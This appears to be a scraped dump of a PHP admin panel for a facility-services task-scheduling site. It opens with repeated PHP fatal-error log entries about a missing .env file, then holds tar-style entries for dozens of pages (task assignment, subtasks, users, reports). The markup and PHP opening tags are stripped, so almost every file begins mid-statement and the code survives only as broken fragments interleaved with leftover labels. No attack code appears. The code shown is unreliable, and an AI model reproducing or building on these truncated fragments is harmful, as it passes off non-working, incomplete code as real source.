/home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 03:39:32 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 03:39:53 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [24-Apr-2026 19:57:20 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [24-Apr-2026 21:12:31 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [25-Apr-2026 06:09:14 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [25-Apr-2026 15:51:56 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [25-Apr-2026 17:25:04 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [27-Apr-2026 03:21:12 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [27-Apr-2026 03:22:13 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 emeraadmin/add_subtask.php000064400000002236151676701240011657 0ustar00format('Y-m-d H:i:s'); $updated_at = $now->format('Y-m-d H:i:s'); // Create a new Subtask object $subtask = new Subtask('', $task_id, $service_id, $subtask_date, $subtask_time,$created_at,$updated_at,0,"",0,"","",""); // Instantiate SubtaskService $subtaskService = new SubtaskService(); // Replace with your SubtaskService class instantiation // Attempt to add the subtask if ($subtaskService->addSubtask($subtask)) { echo "Subtask added successfully!"; } else { echo "Failed to add subtask."; } } else { echo "Invalid request method."; } ?> emeraadmin/uploadSchedule.php000064400000015246151676701240012341 0ustar00

Upload Schedules

Drag and drop your file here, or click to select it.

Uploading...

emeraadmin/submitsubtaskmanually.php000064400000033446151676701240014045 0ustar00getAllIncompletedSubtaksGroupByDate($startDate, $endDate); ?>
>
  
$subtaskList) { ?>

Subtasks for

# ID Service Name Date Time Assigned Actions
ST-000 Assigned' : 'Not Assigned'; ?> View
emeraadmin/bulk_assign_tasks.php000064400000002730151676701240013100 0ustar00assignTaskToCompany($taskId, $companyId); if (!$result) { $errors[] = "Failed to assign task ID: $taskId"; } } if (empty($errors)) { $response = [ 'status' => 'success', 'taskIds' => implode(', ', $taskIds), 'companyId' => $companyId ]; } else { $response = [ 'status' => 'error', 'message' => 'Some tasks could not be assigned.', 'errors' => $errors ]; } echo json_encode($response); } else { echo json_encode(['status' => 'invalid_data', 'message' => 'Invalid data provided']); } } else { echo json_encode(['status' => 'invalid_request', 'message' => 'Invalid request method']); } ?> emeraadmin/report_subtaskswithnotes.php000064400000032760151676701240014577 0ustar00getAllServicesForDropdown(); // Fetch assigned user ID from session or request $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); // Default to 1 if not set // Fetch all notes grouped by date $startDate = $_GET['start_date'] ?? null; $endDate = $_GET['end_date'] ?? null; $subcontractorId = $_GET['subcontractor_id'] ?? null; $serviceLocationId = $_GET['service_location_id'] ?? null; if ($_GET['filter_today'] ?? false) { $startDate = date('Y-m-d'); $endDate = date('Y-m-d'); } $subtasks = $taskService->getAllSubtasksWithNotesGroupByDate($startDate, $endDate, $subcontractorId, $serviceLocationId); ?>
>
   
$subtaskList) { ?>

Subtasks for

ID Service Name Subcontractor Date Time Notes Actions
ST-000 View
emeraadmin/navbar.php000064400000010126151676701240010641 0ustar00emeraadmin/delete_schedule.php000064400000003177151676701240012516 0ustar00verifyUserPassword($_SESSION['user_email'], $_POST['password'])) { // Proceed with deletion if (isset($_POST['scheduleId']) && !empty($_POST['scheduleId'])) { $scheduleId = $System->decryptData($_POST['scheduleId']); if (!$scheduleId) { echo "Invalid Schedule ID"; exit; } // Pass the scheduleId and userId (assuming it's stored in session as user_id) $userId = $_SESSION['user_id']; // Fetch the userId from the session // Call the method with both arguments $deleteResult = $scheduleService->deleteScheduleWithTasksByAdmin($scheduleId, $userId); if ($deleteResult === true) { echo "success"; } else { echo $deleteResult; // Echo error message or permission denied } } else { echo "Schedule ID is missing"; } } else { echo "Invalid password"; exit; } } emeraadmin/assigntasks.php000064400000045251151676701240011731 0ustar00getAllUnassignedTasks($filters); ?>

Search Tasks

Clear Filters

View Tasks

# Service Name Region Frequency Created By Created At Assigned Rejected By Public Status Actions
id); ?> service_name); ?> region); ?> frequency); ?> added_by_name); ?> created_at)); ?> is_assigned ? '' : ''); ?> not_accepted_users as $userId) { // Fetch and display username based on user ID $userName = $UserService->fetchUserName($userId); // Assuming a function fetchUserName exists echo htmlspecialchars($userName) . '
'; } ?>
View Details
No tasks found.
emeraadmin/ongoingtasks.php000064400000020037151676701240012100 0ustar00getAllOngoingTasks($filters); ?>

Search Tasks

Clear Filters

View Tasks

# Service Name Region Frequency Created By Created At Finished Assigned Assigned To Accepted Public Status Actions
id); ?> service_name); ?> region); ?> frequency); ?> added_by_name); ?> created_at)); ?> finished ? '' : ''); ?> is_assigned ? '' : ''); ?> assigned_to_name); ?> accepted ? ' ' : ''); ?> View Details
No tasks found.
emeraadmin/viewtask.php000064400000123350151676701240011231 0ustar00decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$taskId) { echo ''; } $task = $taskService->getTaskById($taskId); // show error if the task is not found with Swal alert if (!$task) { exit(); } } else { echo '

No task ID provided.

'; } $subtasks = $taskService->getSubtasksByTaskId($taskId); $subtaskDates = ''; for ($i = 0; $i < count($subtasks); $i++) { $subtaskDates .= '"' . $subtasks[$i]->subtask_date . '"'; if ($i < count($subtasks) - 1) { $subtaskDates .= ','; } } ?>
is_assigned) { //echo 'View assigned company'; echo ''; } if (!$task->is_assigned && !$task->isPublic) { echo ' '; } ?>
is_assigned) : ?>

service_name; ?>

region; ?>
schedule_name; ?>
frequency; ?>

finished ? 'Task completed' : 'Not Completed'); ?>

isPublic ? 'Public' : 'Not Public'); ?>

is_assigned ? 'Assigned' : 'Not Assigned'); ?>

Task Assigned To assigned_to_name; ?>
dates is a JSON string $datesJson = $task->dates; // Decode the JSON string to an array $datesArray = json_decode($datesJson, true); // Extract the dates and format them for JavaScript $formattedDates = array_map(function ($dateEntry) { return '"' . $dateEntry['date'] . '"'; }, $datesArray); $jsDates = implode(",", $formattedDates); // Convert the array to a comma-separated string ?>

Subtasks

is_assigned == 0) { echo ''; } ?>
completed && !$subtask->ignored) { echo ' '; } else { echo ''; } ?>
# Id Date Updated At Assigned Completed Actions
ST-000id; ?> subtask_date; ?> updated_at)); ?> assigned ? 'Assigned' : 'Not Assigned'); ?> ignored) { echo 'Ignored'; } else { echo $subtask->completed ? 'Completed' : 'Not Completed'; } ?> View assigned == 0 && $task->is_assigned == 0) { echo ''; } ?>
No subtasks found for this task.

'; } ?>
emeraadmin/scripts.php000064400000006374151676701240011071 0ustar00 emeraadmin/sidebar.php000064400000010246151676701240011004 0ustar00
emeraadmin/viewservices.php000064400000024772151676701240012122 0ustar00getAllServices(); ?>
Name Region Actions
name; ?> region; ?> View
emeraadmin/report_tasksAssignedToUsers.php000064400000012050151676701240015111 0ustar00getTasksAssignedToUsers(); ?>
$tasks) { ?>
Unassigned Tasks'; } else { echo '

Tasks Assigned to ' . htmlspecialchars($userName) . '

'; } ?>
ID Service Name Status Actions
TK-000id); ?> service_name); ?> accepted) { echo 'Accepted'; } elseif ($task->is_assigned && !$task->accepted) { echo 'Pending'; } else { echo 'Not Assigned'; } ?> View
emeraadmin/submit_schedule.php000064400000001462151676701240012552 0ustar00addSchedule($schedule)) { echo "Schedule added successfully!"; } else { echo "Failed to add schedule."; } } else { echo "Invalid request method."; } ?> emeraadmin/header.php000064400000016270151676701240010626 0ustar00
-->
emeraadmin/make_tasks_public.php000064400000002107151676701240013050 0ustar00makeTaskPublic($taskId); if (!$result) { $errors[] = "Failed to make task ID: $taskId public"; } } if (empty($errors)) { $response = [ 'status' => 'success', 'taskIds' => implode(', ', $taskIds) ]; } else { $response = [ 'status' => 'error', 'message' => 'Some tasks could not be made public.', 'errors' => $errors ]; } header('Content-Type: application/json'); echo json_encode($response); } else { echo 'invalid_request'; } ?> emeraadmin/unacceptedtasks.php000064400000020053151676701240012551 0ustar00getAllUnacceptedTasks($filters); ?>

Search Tasks

Clear Filters

View Tasks

# Service Name Region Frequency Created By Created At Finished Assigned Assigned To Accepted Public Status Actions
id); ?> service_name); ?> region); ?> frequency); ?> added_by_name); ?> created_at)); ?> finished ? '' : ''); ?> is_assigned ? '' : ''); ?> assigned_to_name); ?> accepted ? ' ' : ''); ?> View Details
No tasks found.
emeraadmin/user_operations.php000064400000005276151676701240012623 0ustar00isEmailExists($email)) { echo json_encode(['status' => 'error', 'message' => 'Email already exists']); return; } $userService->addUser($firstName, $lastName, $email, $phone, $role, $status, $password); echo json_encode(['status' => 'success']); } function updateUser($userService) { $id = $_POST['id']; $firstName = $_POST['first_name']; $lastName = $_POST['last_name']; $email = $_POST['email']; $phone = $_POST['phone']; $role = $_POST['role']; // Check if email already exists for other users if ($userService->isEmailExistsForOthers($id, $email)) { echo json_encode(['status' => 'error', 'message' => 'Email already exists']); return; } $userService->updateUser($id, $firstName, $lastName, $email, $phone, $role); echo json_encode(['status' => 'success']); } function deleteUser($userService, $id) { $userService->deleteUser($id); echo json_encode(['status' => 'success']); } function getUser($userService, $id) { $user = $userService->getUserById($id); echo json_encode($user); } function resetPassword($userService) { $id = $_POST['user_id']; $password = $_POST['new-password']; $userService->resetPassword($id, $password); echo json_encode(['status' => 'success']); } ?> emeraadmin/viewusers2.php000064400000061046151676701240011515 0ustar00getAllUsers(); ?>
ID Name Email Phone Role Status Actions
id; ?> first_name . ' ' . $user->last_name; ?> email; ?> phone; ?> role === 'emera_admin' ? 'warning' : 'success') .'">'.ucfirst($user->role).''; ?> status === 'active' ? 'success' : 'danger').'">'.($user->status === 'active' ? 'Active.' : 'Inactive').''; ?> status === 'active'): ?>
emeraadmin/submit_task.php000064400000001716151676701240011722 0ustar00addTask($task)) { echo "Task added successfully!"; } else { echo "Failed to add task."; } } else { echo "Invalid request method."; } ?> emeraadmin/submit_service.php000064400000002561151676701240012417 0ustar00addService($service)) { echo "Service added successfully!"; } else { echo "Failed to add service."; } } else { echo "Invalid request method."; } ?> emeraadmin/reports.php000064400000012043151676701240011066 0ustar00
emeraadmin/viewschedules.php000064400000034531151676701240012250 0ustar00getAllSchedules($filters); ?>

Filter Schedules

Clear Filters
ID Schedule Name Completed Created By Created At Actions
id; ?> schedule_name); ?> completed ? '' : ''); ?> created_by); ?> created_at)); ?> View Tasks  
No schedules found.
emeraadmin/delete_subtask.php000064400000001021151676701240012360 0ustar00deleteSubtaskById($subtaskId)) { echo 'success'; } else { echo 'error'; } } else { echo 'invalid_request'; } ?> emeraadmin/viewscheduletasks.php000064400000076612151676701240013141 0ustar00 getAllServicesForDropdown(); // Create TaskService instance $taskService = new TaskService(); $System = new System(); $schedule_id = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$schedule_id) { echo ""; exit; } // Fetch tasks from the database that belong to the given schedule $tasks = $taskService->getTasksByScheduleId($schedule_id); ?>

View Tasks

ID Service Name Region Frequency Created By Created At Finished Assigned Assigned To Public Status Actions
id; ?> service_name; ?> region; ?> frequency; ?> created_by_name; ?> created_at)); ?> finished ? '' : ''); ?> is_assigned ? '' : ''); ?> assigned_to_name; ?> isPublic ? '' : ''); ?> View Details is_assigned == 0): ?>
emeraadmin/dashboard.php000064400000037572151676701240011335 0ustar00getServicesCount(); $tasks = $reportsAndDashboardService->getTasksCount(); $assignedTasks = $reportsAndDashboardService->getAssignTasksCount(); $contracts = $reportsAndDashboardService->getContractorsCount(); $subtasks = $reportsAndDashboardService->getSubtasks(); // Fetch completed and incomplete subtask summary data $subtasksSummary = $reportsAndDashboardService->getSubtasksSummaryAdmin(); $completedSubTasks = $subtasksSummary['completed']; $incompleteSubTasks = $subtasksSummary['incomplete']; $ongoingSubTasks = $completedSubTasks + $incompleteSubTasks; // Calculating ongoing subtasks // Fetch total finished and not finished task summary data $taskSummary = $reportsAndDashboardService->getTasksSummaryAdmin(); $completedTasks = $taskSummary['completed']; $incompleteTasks = $taskSummary['incomplete']; $ongoingTasks = $taskSummary['ongoing']; $todaySubtasksSummary = $reportsAndDashboardService->getSubtasksSummaryForTodayAdmin(date('Y-m-d')); $todayTotalSubTasks = $todaySubtasksSummary['total']; $todayCompletedSubTasks = $todaySubtasksSummary['completed']; $todayIncompleteSubTasks = $todaySubtasksSummary['incomplete']; ?>

Overall Subtasks Summary

Ongoing Subtasks

Completed Subtasks

Incomplete Subtasks

Today's Subtasks Summary:

Total Subtasks to be Completed

Completed Subtasks

Incomplete Subtasks

Sub Contractors

count; ?>

Services

count; ?>

Assigned Tasks

count; ?>

Unassigned Tasks

count; ?>

Completed Subtasks

emeraadmin/submit_user.php000064400000002036151676701240011732 0ustar00addUser($first_name, $last_name, $email, $phone, $role, $status, $password)) { echo "User added successfully!"; } else { echo "Failed to add user."; } } else { echo "Invalid request method."; } ?> emeraadmin/reports_acceptedtasksbyusers.php000064400000007457151676701240015416 0ustar00getAcceptedTasks(); ?>
ID Service Name Region Assigned User Actions
id); ?> service_name); ?> region); ?> assigned_user); ?> View
emeraadmin/update_service.php000064400000003265151676701240012400 0ustar00 filter_var($_POST['id'], FILTER_SANITIZE_NUMBER_INT), 'name' => filter_var($_POST['name'], FILTER_SANITIZE_STRING), 'region' => filter_var($_POST['region'], FILTER_SANITIZE_STRING), 'address_line1' => filter_var($_POST['address_line1'], FILTER_SANITIZE_STRING), 'address_line2' => filter_var($_POST['address_line2'], FILTER_SANITIZE_STRING), 'suburb' => filter_var($_POST['suburb'], FILTER_SANITIZE_STRING), 'city' => filter_var($_POST['city'], FILTER_SANITIZE_STRING), 'state' => filter_var($_POST['state'], FILTER_SANITIZE_STRING), 'postal_code' => filter_var($_POST['postal_code'], FILTER_SANITIZE_STRING), 'country' => filter_var($_POST['country'], FILTER_SANITIZE_STRING), 'phone' => filter_var($_POST['phone'], FILTER_SANITIZE_STRING), 'on_site_location' => filter_var($_POST['on_site_location'], FILTER_SANITIZE_STRING), 'latitude' => filter_var($_POST['latitude'], FILTER_SANITIZE_STRING), 'longitude' => filter_var($_POST['longitude'], FILTER_SANITIZE_STRING) ]; // Instantiate the ServiceService class $serviceService = new ServiceService(); // Call the update method $result = $serviceService->updateService($serviceData); // Provide appropriate feedback if ($result) { echo 'Service updated successfully'; } else { echo 'Failed to update service'; } } else { echo 'Invalid request'; } ?> emeraadmin/get_service.php000064400000000665151676701240011676 0ustar00getServiceById($serviceId); if ($service) { echo json_encode($service); } else { echo json_encode(['error' => 'Service not found']); } } else { echo json_encode(['error' => 'Invalid request']); } ?> emeraadmin/mark_subtask_as_completed.php000064400000003014151676701240014573 0ustar00markSubtaskAsComplete($subtaskId); if (!$result) { $errors[] = "Failed to mark subtask ID: $subtaskId as complete"; } } if (empty($errors)) { $response = [ 'status' => 'success', 'subtaskIds' => $subtaskIds ]; } else { $response = [ 'status' => 'error', 'message' => 'Some subtasks could not be marked as complete.', 'errors' => $errors ]; } header('Content-Type: application/json'); echo json_encode($response); } else { echo json_encode(['status' => 'error', 'message' => 'Invalid input']); } } else { echo 'invalid_request'; } ?> emeraadmin/head.php000064400000010234151676701240010271 0ustar00isLoggedIn() || !$system->isEmeraAdmin()) { header('Location: ../login.php'); exit; // Stop further execution } $companyId = $_SESSION['user_id']; ?> <?php echo isset($pageTitle) ? $pageTitle : "Emera Facility Services"; ?>
emeraadmin/viewsubtask.php000064400000046712151676701240011751 0ustar00 No subtask ID provided.

'; exit; } $subtaskId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$subtaskId) { echo ''; exit; } $subtask = $subtaskService->getSubtaskById($subtaskId); $users = $userService->getAllUsers(); if ($subtask->completed) { $submittedLocation = $subtaskService->getSubtaskLocation($subtaskId); if ($submittedLocation) { $latitude = $submittedLocation->latitude; $longitude = $submittedLocation->longitude; } else { // Handle the case where location is not found $latitude = null; $longitude = null; // Optionally, display an error message or take other actions echo "Location not found for the specified subtask."; } } ?>
Back
assigned): ?> assigned && !$subtask->completed): ?> completed): ?>

service_name; ?>

subtask_date ? date('F j, Y', strtotime($subtask->subtask_date)) : 'Not set'; ?>
subtask_time ? date('g:i A', strtotime($subtask->subtask_time)) : 'Not set'; ?>
updated_at)); ?>
completed && $subtask->submitted_by_admin): ?> completed_at)); ?>assigned): ?> completed && property_exists($subtask, 'submitted_by_admin') && $subtask->submitted_by_admin): ?> form_submission_id): ?> completed_at contains the datetime string $completedAt = $subtask->completed_at; // Create a new DateTime object with the original datetime $date = new DateTime($completedAt, new DateTimeZone('UTC')); // Set the timezone to Sydney $date->setTimezone(new DateTimeZone('Australia/Sydney')); // Format the date and time $formattedDate = $date->format('F j, Y, g:i a'); ?>
ignored) { echo 'Ignored'; } else { if ($subtask->completed) { echo 'Completed '; } else { echo 'Not Completed'; } } ?>
assigned): ?> Assigned Not assigned
assigned_to_Mobile ?: 'Not set'; ?>
assigned_Message_Rsponse ? 'Email sent successfully' : 'Unable to send email'; ?>
form_submission_id): ?> View Submitted Form Form not submitted
Marked as completed by admin
completed && $latitude !== null && $longitude !== null): ?>

Submitted Location

emeraadmin/report_rejectedtasksvyusers.php000064400000010411151676701240015254 0ustar00getPendingTasksWithRejectedUsers(); ?>
ID Service Name Region Rejected Users Actions
id); ?> service_name); ?> region); ?> not_accepted_users as $userId) { // Fetch and display user name based on user ID $userName = $UserService->fetchUserName($userId); // Assuming a function fetchUserName exists echo htmlspecialchars($userName) . '
'; } ?>
View
emeraadmin/viewservice.php000064400000053004151676701240011725 0ustar00 No service ID provided.

'; exit; } $serviceId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$serviceId) { echo ''; exit; } $service = $serviceService->getServiceById($serviceId); if (!$service) { echo '

Service not found.

'; exit; } $latitude = $service->latitude; $longitude = $service->longitude; ?>

General Information

name?: 'Name not provided'; ?>

region; ?>

Address Details

address_line1 ?: 'Address Line 1 not provided'; ?>
address_line2 ?: 'Address Line 2 not provided'; ?>
suburb ?: 'Suburb not provided'; ?>
city?: 'City not provided'; ?>
state ?: 'State not provided'; ?>
postal_code ?: 'Postal code not provided'; ?>
country?: 'Country not provided'; ?>
phone?: 'Phone not provided'; ?>

On Site Location

on_site_location ?: 'Not provided'; ?>

Longitude and Latitude

latitude ?: 'Not provided'; ?>
longitude ?: 'Not provided'; ?>

Timestamps

created_at)); ?>
updated_at)); ?>
emeraadmin/assigntask.php000064400000001305151676701240011536 0ustar00assignTaskToCompany($taskId, $companyId); if ($result) { echo 'success'; } else { echo 'error'; } } else { echo 'invalid_data'; } } else { echo 'invalid_request'; } emeraadmin/exportScheduleData.php000064400000010401151676701240013154 0ustar00getAllSchedules(); ?>
emeraadmin/footer.php000064400000000413151676701240010664 0ustar00
emeraadmin/report_subtaks_datewise.php000064400000041761151676701240014335 0ustar00getAllServicesForDropdown(); // Fetch assigned user ID from session or request $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); // Default to 1 if not set // Create TaskService instance $taskService = new TaskService(); $System = new System(); // Assuming System class is correctly defined and used $TaskProviderId = $_SESSION['user_id']; // Fetch all subtasks grouped by date $startDate = $_GET['start_date'] ?? null; $endDate = $_GET['end_date'] ?? null; $subcontractorId = $_GET['subcontractor_id'] ?? null; $serviceLocationId = $_GET['service_location_id'] ?? null; if ($_GET['filter_today'] ?? false) { $startDate = date('Y-m-d'); $endDate = date('Y-m-d'); } $subtasks = $taskService->getAllSubtasksGroupByDate($startDate, $endDate, $subcontractorId, $serviceLocationId); //print_r($subtasks); //get completed subtask count form $subtasks $CompletedSubtaskcount = 0; $IncompletedSubtaskcount = 0; foreach ($subtasks as $date => $subtaskList) { foreach ($subtaskList as $subtask) { if ($subtask['completed']) { $CompletedSubtaskcount++; } else { $IncompletedSubtaskcount++; } } } ?>
>
   
$subtaskList) { ?>

Subtasks for

ID Service Name Subcontractor Date Time Assigned Completed Actions
ST-000 Assigned' : 'Not Assigned'; ?> Ignored'; } else { echo $subtask['completed'] ? 'Completed' : 'Not Completed'; } ?> View
emeraadmin/viewtasks.php000064400000025144151676701240011416 0ustar00getAllTasks($filters); ?>

Search Tasks

Clear Filters

View Tasks

# Service Name Region Frequency Created By Created At Finished Assigned Assigned To Accepted Public Status Actions
id); ?> service_name); ?> region); ?> frequency); ?> added_by_name); ?> created_at)); ?> finished ? '' : ''); ?> is_assigned ? '' : ''); ?> assigned_to_name); ?> accepted ? ' ' : ''); ?> View Details
No tasks found.
emeraadmin/makepublic.php000064400000000770151676701240011510 0ustar00makeTaskPublic($_POST['taskId']); if ($result) { echo 'success'; } else { echo 'error'; } } else { echo 'invalid_request'; }emeraadmin/delete_task.php000064400000001574151676701240011663 0ustar00decryptData($taskId); error_log("Task ID received: " . $taskId); // Check the received task ID error_log("Decrypted Task ID: " . $decryptedtaskId); // Check the decrypted task ID if (!$taskId) { echo "Invalid Task ID"; exit; } // Call deleteTaskWithSubtasks method from TaskService $deleteResult = $taskService->deleteTaskWithSubtasks($decryptedtaskId); if ($deleteResult === true) { echo "success"; } else { echo "error"; } } else { echo "Task ID is missing"; } ?> emeraadmin/ignore_subtasks.php000064400000001731151676701240012574 0ustar00ignoreSubtasks($subtaskIds); if ($ignoreResult) { $response['status'] = 'success'; $response['message'] = 'All subtasks ignored successfully'; } else { $response['status'] = 'error'; $response['message'] = 'One or more subtasks could not be ignored'; } } else { $response['status'] = 'error'; $response['message'] = 'Subtask IDs are missing'; } echo json_encode($response); ?> emeraadmin/report_TaskSummaryForUsers.php000064400000012353151676701240014740 0ustar00getTaskSummaryForUsers(); ?>

Task Assign Summary for Each User

User ID User Name Assigned Tasks Accepted Tasks Pending Tasks
user_id); ?> user_name); ?> assigned_tasks); ?> accepted_tasks); ?> pending_tasks); ?>

Task Completion Summary for Each User

User ID User Name Accepted Tasks Completed Tasks Incomplete Tasks
user_id); ?> user_name); ?> accepted_tasks); ?> completed_tasks); ?> not_completed_tasks); ?>
taskprovider/export_schedule.php000064400000011045151676701240013201 0ustar00getConn(); // SQL query to fetch tasks with subtask dates and times formatted $sql = " SELECT srv.name AS service_name, srv.region, t.frequency, GROUP_CONCAT(DISTINCT st.subtask_date ORDER BY st.subtask_date SEPARATOR ', ') AS subtask_dates FROM tasks t JOIN subtasks st ON t.id = st.task_id JOIN services srv ON t.service_id = srv.id WHERE t.schedule_id = :schedule_id GROUP BY srv.name, srv.region, t.frequency, t.id ORDER BY srv.name, srv.region, t.frequency "; $stmt = $pdo->prepare($sql); $stmt->bindValue(':schedule_id', $scheduleId, PDO::PARAM_INT); $stmt->execute(); $tasks = $stmt->fetchAll(PDO::FETCH_ASSOC); // Create a new Spreadsheet object $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); // Set headers or titles in the Excel sheet $sheet->setCellValue('A1', 'Service Name'); $sheet->setCellValue('B1', 'Region'); $sheet->setCellValue('C1', 'Frequency'); // Get all distinct subtask dates $distinctDates = []; foreach ($tasks as $task) { $dates = explode(', ', $task['subtask_dates']); $distinctDates = array_merge($distinctDates, $dates); } $distinctDates = array_unique($distinctDates); sort($distinctDates); // Set dates as headers in the Excel sheet $col = 'D'; foreach ($distinctDates as $date) { $sheet->setCellValue($col . '1', $date); $sheet->getColumnDimension($col)->setWidth(12); // Adjust width as needed $col++; } // Populate tasks data into Excel $row = 2; foreach ($tasks as $task) { $sheet->setCellValue('A' . $row, $task['service_name']); $sheet->setCellValue('B' . $row, $task['region']); $sheet->setCellValue('C' . $row, $task['frequency']); // Split subtask dates for the current task $dates = explode(', ', $task['subtask_dates']); $col = 'D'; foreach ($distinctDates as $date) { // Check if the date exists for the current task or color black $value = in_array($date, $dates) ? 'X' : ''; // Set value in corresponding cell $cellCoordinate = $col . $row; 